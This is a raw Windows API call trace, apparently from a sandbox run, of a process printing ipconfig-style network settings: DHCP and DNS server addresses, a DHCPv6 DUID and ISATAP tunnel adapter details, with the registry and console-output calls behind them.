[0124.125] _fileno (_File=0x7ffe97fce240) returned 1 [0124.125] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.125] LocalFree (hMem=0x4899e0) returned 0x0 [0124.125] LocalFree (hMem=0x47bb80) returned 0x0 [0124.125] ConvertInterfaceLuidToGuid (in: InterfaceLuid=0x483a90, InterfaceGuid=0xcfa20 | out: InterfaceGuid=0xcfa20*(Data1=0xe96d977e, Data2=0xf067, Data3=0x4ce9, Data4=([0]=0x92, [1]=0x4d, [2]=0xf6, [3]=0xe0, [4]=0xa0, [5]=0x47, [6]=0x29, [7]=0xe4))) returned 0x0 [0124.126] ConvertGuidToStringW () returned 0x0 [0124.126] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters\\Interfaces\\{E96D977E-F067-4CE9-924D-F6E0A04729E4}", ulOptions=0x0, samDesired=0x20019, phkResult=0xcfa08 | out: phkResult=0xcfa08*=0xac) returned 0x0 [0124.126] RegQueryValueExW (in: hKey=0xac, lpValueName="Dhcpv6ClassId", lpReserved=0x0, lpType=0xcfa18, lpData=0xcfb40, lpcbData=0xcfa10*=0x200 | out: lpType=0xcfa18*=0x0, lpData=0xcfb40*=0x4d, lpcbData=0xcfa10*=0x200) returned 0x2 [0124.126] ConvertInterfaceLuidToGuid (in: InterfaceLuid=0x483a90, InterfaceGuid=0xcfa20 | out: InterfaceGuid=0xcfa20*(Data1=0xe96d977e, Data2=0xf067, Data3=0x4ce9, Data4=([0]=0x92, [1]=0x4d, [2]=0xf6, [3]=0xe0, [4]=0xa0, [5]=0x47, [6]=0x29, [7]=0xe4))) returned 0x0 [0124.126] ConvertGuidToStringW () returned 0x0 [0124.126] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{E96D977E-F067-4CE9-924D-F6E0A04729E4}", ulOptions=0x0, samDesired=0x20019, phkResult=0xcfa08 | out: phkResult=0xcfa08*=0x10c) returned 0x0 [0124.126] RegQueryValueExW (in: hKey=0x10c, lpValueName="DhcpClassId", lpReserved=0x0, lpType=0xcfa18, lpData=0xcfb40, lpcbData=0xcfa10*=0x200 | out: lpType=0xcfa18*=0x0, lpData=0xcfb40*=0x4d, lpcbData=0xcfa10*=0x200) returned 0x2 [0124.126] RtlIpv4AddressToStringExW () returned 0x0 [0124.126] __iob_func () returned 0x7ffe97fce210 [0124.126] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x278f, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x34 [0124.126] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.126] _fileno (_File=0x7ffe97fce240) returned 1 [0124.126] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.126] GetFileType (hFile=0x61c) returned 0x1 [0124.126] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.126] _fileno (_File=0x7ffe97fce240) returned 1 [0124.127] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.127] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0124.127] LocalAlloc (uFlags=0x40, uBytes=0x35) returned 0x4899e0 [0124.127] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n", cchWideChar=-1, lpMultiByteStr=0x4899e0, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n", lpUsedDefaultChar=0x0) returned 53 [0124.127] _fileno (_File=0x7ffe97fce240) returned 1 [0124.127] _write (in: _FileHandle=1, _Buf=0x4899e0*, _MaxCharCount=0x34 | out: _Buf=0x4899e0*) returned 52 [0124.127] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.127] _fileno (_File=0x7ffe97fce240) returned 1 [0124.127] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.127] LocalFree (hMem=0x4899e0) returned 0x0 [0124.127] LocalFree (hMem=0x47bb80) returned 0x0 [0124.127] __iob_func () returned 0x7ffe97fce210 [0124.127] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2a31, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x32 [0124.127] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.127] _fileno (_File=0x7ffe97fce240) returned 1 [0124.127] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.127] GetFileType (hFile=0x61c) returned 0x1 [0124.127] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.127] _fileno (_File=0x7ffe97fce240) returned 1 [0124.127] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.127] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCPv6 IAID . . . . . . . . . . . : 100667379\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0124.127] LocalAlloc (uFlags=0x40, uBytes=0x33) returned 0x489ba0 [0124.127] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCPv6 IAID . . . . . . . . . . . : 100667379\r\n", cchWideChar=-1, lpMultiByteStr=0x489ba0, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" DHCPv6 IAID . . . . . . . . . . . : 100667379\r\n", lpUsedDefaultChar=0x0) returned 51 [0124.127] _fileno (_File=0x7ffe97fce240) returned 1 [0124.127] _write (in: _FileHandle=1, _Buf=0x489ba0*, _MaxCharCount=0x32 | out: _Buf=0x489ba0*) returned 50 [0124.127] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.127] _fileno (_File=0x7ffe97fce240) returned 1 [0124.128] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.128] LocalFree (hMem=0x489ba0) returned 0x0 [0124.128] LocalFree (hMem=0x47bb80) returned 0x0 [0124.128] GetProcessHeap () returned 0x470000 [0124.128] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x54) returned 0x47ff20 [0124.128] _vsnwprintf (in: _Buffer=0x47ff20, _BufferCount=0x29, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff26, _BufferCount=0x26, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="01-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff2c, _BufferCount=0x23, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff32, _BufferCount=0x20, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="01-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff38, _BufferCount=0x1d, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="28-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff3e, _BufferCount=0x1a, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="B6-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff44, _BufferCount=0x17, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="28-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff4a, _BufferCount=0x14, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="5E-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff50, _BufferCount=0x11, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff56, _BufferCount=0xe, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="0F-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff5c, _BufferCount=0xb, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="F3-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff62, _BufferCount=0x8, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="E1-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff68, _BufferCount=0x5, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="61-") returned 3 [0124.128] _vsnwprintf (in: _Buffer=0x47ff6e, _BufferCount=0x2, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="38") returned -1 [0124.128] __iob_func () returned 0x7ffe97fce210 [0124.128] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2a30, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x52 [0124.128] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.128] _fileno (_File=0x7ffe97fce240) returned 1 [0124.128] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.128] GetFileType (hFile=0x61c) returned 0x1 [0124.128] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.128] _fileno (_File=0x7ffe97fce240) returned 1 [0124.129] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.129] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0124.129] LocalAlloc (uFlags=0x40, uBytes=0x53) returned 0x47ff80 [0124.129] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n", cchWideChar=-1, lpMultiByteStr=0x47ff80, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n", lpUsedDefaultChar=0x0) returned 83 [0124.129] _fileno (_File=0x7ffe97fce240) returned 1 [0124.129] _write (in: _FileHandle=1, _Buf=0x47ff80*, _MaxCharCount=0x52 | out: _Buf=0x47ff80*) returned 82 [0124.129] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.129] _fileno (_File=0x7ffe97fce240) returned 1 [0124.129] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.129] LocalFree (hMem=0x47ff80) returned 0x0 [0124.129] LocalFree (hMem=0x47bb80) returned 0x0 [0124.129] GetProcessHeap () returned 0x470000 [0124.129] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47ff20) returned 1 [0124.129] RtlIpv4AddressToStringExW () returned 0x0 [0124.129] __iob_func () returned 0x7ffe97fce210 [0124.129] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2790, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x34 [0124.129] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.129] _fileno (_File=0x7ffe97fce240) returned 1 [0124.129] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.129] GetFileType (hFile=0x61c) returned 0x1 [0124.129] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.129] _fileno (_File=0x7ffe97fce240) returned 1 [0124.129] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.129] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0124.129] LocalAlloc (uFlags=0x40, uBytes=0x35) returned 0x489c60 [0124.129] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n", cchWideChar=-1, lpMultiByteStr=0x489c60, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n", lpUsedDefaultChar=0x0) returned 53 [0124.129] _fileno (_File=0x7ffe97fce240) returned 1 [0124.129] _write (in: _FileHandle=1, _Buf=0x489c60*, _MaxCharCount=0x34 | out: _Buf=0x489c60*) returned 52 [0124.130] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.130] _fileno (_File=0x7ffe97fce240) returned 1 [0124.130] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.130] LocalFree (hMem=0x489c60) returned 0x0 [0124.130] LocalFree (hMem=0x47bb80) returned 0x0 [0124.130] __iob_func () returned 0x7ffe97fce210 [0124.130] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x279d, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x30 [0124.130] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.130] _fileno (_File=0x7ffe97fce240) returned 1 [0124.130] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.130] GetFileType (hFile=0x61c) returned 0x1 [0124.130] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.130] _fileno (_File=0x7ffe97fce240) returned 1 [0124.130] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.130] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" NetBIOS over Tcpip. . . . . . . . : Enabled\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0124.130] LocalAlloc (uFlags=0x40, uBytes=0x31) returned 0x4899e0 [0124.130] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" NetBIOS over Tcpip. . . . . . . . : Enabled\r\n", cchWideChar=-1, lpMultiByteStr=0x4899e0, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" NetBIOS over Tcpip. . . . . . . . : Enabled\r\n", lpUsedDefaultChar=0x0) returned 49 [0124.130] _fileno (_File=0x7ffe97fce240) returned 1 [0124.130] _write (in: _FileHandle=1, _Buf=0x4899e0*, _MaxCharCount=0x30 | out: _Buf=0x4899e0*) returned 48 [0124.130] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.130] _fileno (_File=0x7ffe97fce240) returned 1 [0124.130] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.130] LocalFree (hMem=0x4899e0) returned 0x0 [0124.130] LocalFree (hMem=0x47bb80) returned 0x0 [0124.130] __iob_func () returned 0x7ffe97fce210 [0124.130] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275e, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x43 [0124.130] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.130] _fileno (_File=0x7ffe97fce240) returned 1 [0124.130] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.131] GetFileType (hFile=0x61c) returned 0x1 [0124.131] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.131] _fileno (_File=0x7ffe97fce240) returned 1 [0124.131] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.131] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nTunnel adapter isatap.{E96D977E-F067-4CE9-924D-F6E0A04729E4}:\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0124.131] LocalAlloc (uFlags=0x40, uBytes=0x44) returned 0x479c70 [0124.131] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nTunnel adapter isatap.{E96D977E-F067-4CE9-924D-F6E0A04729E4}:\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x479c70, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nTunnel adapter isatap.{E96D977E-F067-4CE9-924D-F6E0A04729E4}:\r\n\r\n", lpUsedDefaultChar=0x0) returned 68 [0124.131] _fileno (_File=0x7ffe97fce240) returned 1 [0124.131] _write (in: _FileHandle=1, _Buf=0x479c70*, _MaxCharCount=0x43 | out: _Buf=0x479c70*) returned 67 [0124.131] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.131] _fileno (_File=0x7ffe97fce240) returned 1 [0124.131] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.131] LocalFree (hMem=0x479c70) returned 0x0 [0124.131] LocalFree (hMem=0x47bb80) returned 0x0 [0124.131] ConvertInterfaceIndexToLuid (in: InterfaceIndex=0x3, InterfaceLuid=0xcf8b0 | out: InterfaceLuid=0xcf8b0) returned 0x0 [0124.131] NsiGetAllParameters () returned 0x0 [0124.131] __iob_func () returned 0x7ffe97fce210 [0124.131] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2774, dwLanguageId=0x0, lpBuffer=0xcf830, nSize=0x0, Arguments=0xcf838 | out: lpBuffer="뮀G") returned 0x3b [0124.131] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.131] _fileno (_File=0x7ffe97fce240) returned 1 [0124.131] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.132] GetFileType (hFile=0x61c) returned 0x1 [0124.132] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf710, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.132] _fileno (_File=0x7ffe97fce240) returned 1 [0124.132] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.132] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Media State . . . . . . . . . . . : Media disconnected\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.132] LocalAlloc (uFlags=0x40, uBytes=0x3c) returned 0x4799f0 [0124.132] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Media State . . . . . . . . . . . : Media disconnected\r\n", cchWideChar=-1, lpMultiByteStr=0x4799f0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Media State . . . . . . . . . . . : Media disconnected\r\n", lpUsedDefaultChar=0x0) returned 60 [0124.132] _fileno (_File=0x7ffe97fce240) returned 1 [0124.132] _write (in: _FileHandle=1, _Buf=0x4799f0*, _MaxCharCount=0x3b | out: _Buf=0x4799f0*) returned 59 [0124.132] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.132] _fileno (_File=0x7ffe97fce240) returned 1 [0124.132] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.132] LocalFree (hMem=0x4799f0) returned 0x0 [0124.132] LocalFree (hMem=0x47bb80) returned 0x0 [0124.132] __iob_func () returned 0x7ffe97fce210 [0124.132] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277e, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x29 [0124.132] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.132] _fileno (_File=0x7ffe97fce240) returned 1 [0124.132] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.132] GetFileType (hFile=0x61c) returned 0x1 [0124.132] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.132] _fileno (_File=0x7ffe97fce240) returned 1 [0124.132] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.132] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Connection-specific DNS Suffix . : \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0124.132] LocalAlloc (uFlags=0x40, uBytes=0x2a) returned 0x489a60 [0124.132] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Connection-specific DNS Suffix . : \r\n", cchWideChar=-1, lpMultiByteStr=0x489a60, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Connection-specific DNS Suffix . : \r\n", lpUsedDefaultChar=0x0) returned 42 [0124.132] _fileno (_File=0x7ffe97fce240) returned 1 [0124.132] _write (in: _FileHandle=1, _Buf=0x489a60*, _MaxCharCount=0x29 | out: _Buf=0x489a60*) returned 41 [0124.133] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.133] _fileno (_File=0x7ffe97fce240) returned 1 [0124.133] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.133] LocalFree (hMem=0x489a60) returned 0x0 [0124.133] LocalFree (hMem=0x47bb80) returned 0x0 [0124.133] __iob_func () returned 0x7ffe97fce210 [0124.133] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x277f, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x41 [0124.133] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.133] _fileno (_File=0x7ffe97fce240) returned 1 [0124.133] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.133] GetFileType (hFile=0x61c) returned 0x1 [0124.133] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.133] _fileno (_File=0x7ffe97fce240) returned 1 [0124.133] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.133] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0124.133] LocalAlloc (uFlags=0x40, uBytes=0x42) returned 0x479c70 [0124.133] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n", cchWideChar=-1, lpMultiByteStr=0x479c70, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n", lpUsedDefaultChar=0x0) returned 66 [0124.133] _fileno (_File=0x7ffe97fce240) returned 1 [0124.133] _write (in: _FileHandle=1, _Buf=0x479c70*, _MaxCharCount=0x41 | out: _Buf=0x479c70*) returned 65 [0124.133] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.133] _fileno (_File=0x7ffe97fce240) returned 1 [0124.133] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.133] LocalFree (hMem=0x479c70) returned 0x0 [0124.133] LocalFree (hMem=0x47bb80) returned 0x0 [0124.133] _vsnwprintf (in: _Buffer=0xcfa30, _BufferCount=0x40, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.133] _vsnwprintf (in: _Buffer=0xcfa36, _BufferCount=0x3a, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.133] _vsnwprintf (in: _Buffer=0xcfa3c, _BufferCount=0x34, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.133] _vsnwprintf (in: _Buffer=0xcfa42, _BufferCount=0x2e, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.134] _vsnwprintf (in: _Buffer=0xcfa48, _BufferCount=0x28, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.134] _vsnwprintf (in: _Buffer=0xcfa4e, _BufferCount=0x22, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.134] _vsnwprintf (in: _Buffer=0xcfa54, _BufferCount=0x1c, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="00-") returned 3 [0124.134] _vsnwprintf (in: _Buffer=0xcfa5a, _BufferCount=0x16, _Format="%02X-", _ArgList=0xcf9d8 | out: _Buffer="E0-") returned 3 [0124.134] __iob_func () returned 0x7ffe97fce210 [0124.134] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2780, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x40 [0124.134] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.134] _fileno (_File=0x7ffe97fce240) returned 1 [0124.134] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.134] GetFileType (hFile=0x61c) returned 0x1 [0124.134] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.134] _fileno (_File=0x7ffe97fce240) returned 1 [0124.134] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0124.134] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0124.134] LocalAlloc (uFlags=0x40, uBytes=0x41) returned 0x479fe0 [0124.134] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr=" Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n", cchWideChar=-1, lpMultiByteStr=0x479fe0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n", lpUsedDefaultChar=0x0) returned 65 [0124.134] _fileno (_File=0x7ffe97fce240) returned 1 [0124.134] _write (in: _FileHandle=1, _Buf=0x479fe0*, _MaxCharCount=0x40 | out: _Buf=0x479fe0*) returned 64 [0124.134] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.134] _fileno (_File=0x7ffe97fce240) returned 1 [0124.134] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0124.134] LocalFree (hMem=0x479fe0) returned 0x0 [0124.134] LocalFree (hMem=0x47bb80) returned 0x0 [0124.134] __iob_func () returned 0x7ffe97fce210 [0124.134] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2781, dwLanguageId=0x0, lpBuffer=0xcf9a0, nSize=0x0, Arguments=0xcf9a8 | out: lpBuffer="뮀G") returned 0x2b [0124.134] fflush (in: _File=0x7ffe97fce240 | out: _File=0x7ffe97fce240) returned 0 [0124.134] _fileno (_File=0x7ffe97fce240) returned 1 [0124.134] _get_osfhandle (_FileHandle=1) returned 0x61c [0124.134] GetFileType (hFile=0x61c) returned 0x1 [0124.134] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcf880, nSize=0x50 | out: lpBuffer="") returned 0x0 [0124.135] _fileno (_File=0x7ffe97fce240) returned 1 [0124.135] _setmode 